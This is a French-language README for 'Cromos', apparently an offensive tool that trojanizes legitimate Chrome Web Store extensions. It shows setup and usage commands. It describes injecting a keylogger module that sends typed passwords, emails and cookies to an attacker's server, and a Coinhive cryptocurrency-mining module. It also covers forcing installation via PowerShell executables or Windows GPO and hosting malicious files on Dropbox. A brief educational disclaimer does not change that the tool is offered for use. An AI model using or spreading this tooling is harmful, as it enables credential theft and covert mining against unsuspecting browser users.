
Cromos est un outil pour télécharger des extensions légitimes du Chrome Web Store et injecter du code en arrière-plan de l'application.
Cromos est un outil pour télécharger des extensions légitimes du Chrome Web Store et injecter des codes en arrière-plan de l'application, et plus encore, cromos crée des fichiers exécutables pour forcer l'installation via PowerShell par exemple, et aussi télécharger des fichiers sur Dropbox pour héberger les fichiers malveillants.
Ceci est une démonstration de l'outil en action. Dans cet exemple, je télécharge une célèbre extension Google appelée G Suite Training depuis le Chrome Web Store et j'injecte un module keylogger.
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py
Usage: python cromos.py --extension {id}
Usage: python cromos.py --extension {id} --load {currency/keylogger}
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Vous pouvez également injecter certains modules prédéfinis en arrière-plan comme keylogger, monnaie virtuelle.
| Module | Description |
|---|---|
| modules/keylogger | Ce module capture tous les mots de passe que vous tapez dans un navigateur infecté, que ce soit en HTTPS ou non. Tout ce dont vous avez besoin est d'avoir un serveur PHP par exemple pour recevoir les requêtes. Les paramètres sont email, password, cookies et userAgent. |
| modules/currency | Ce module vous permet de miner des pièces virtuelles en utilisant l'API Coinhive. Vous avez juste besoin d'avoir un compte. |
Chrome vous permet d'ajouter des extensions à l'aide de l'objet de stratégie de groupe Windows (GPO). Si vous devez forcer l'installation sur plusieurs machines, suivez simplement les étapes dans le Guide de déploiement Chrome, puis modifiez l'extension originale avec quelques modifications. Vous pouvez publier votre extension dans le Chrome Web Store, ce qui nécessite de payer 5 $.
Les exemples de code sont fournis à des fins éducatives. Des défenses adéquates ne peuvent être construites qu'en recherchant les techniques d'attaque disponibles pour les acteurs malveillants. L'utilisation de ce code contre des systèmes cibles sans autorisation préalable est illégale dans la plupart des juridictions. Les auteurs ne sont pas responsables des dommages résultant d'une mauvaise utilisation de ces informations ou de ce code.
49m12JEEC6HPCHkLMX5QL4SrDQdKwh6eb4Muu8Z9CwA9MwemhzFQ3VcgHwyuR73rC22WCymTUyep7DVrfN3GPt5JBCekPrR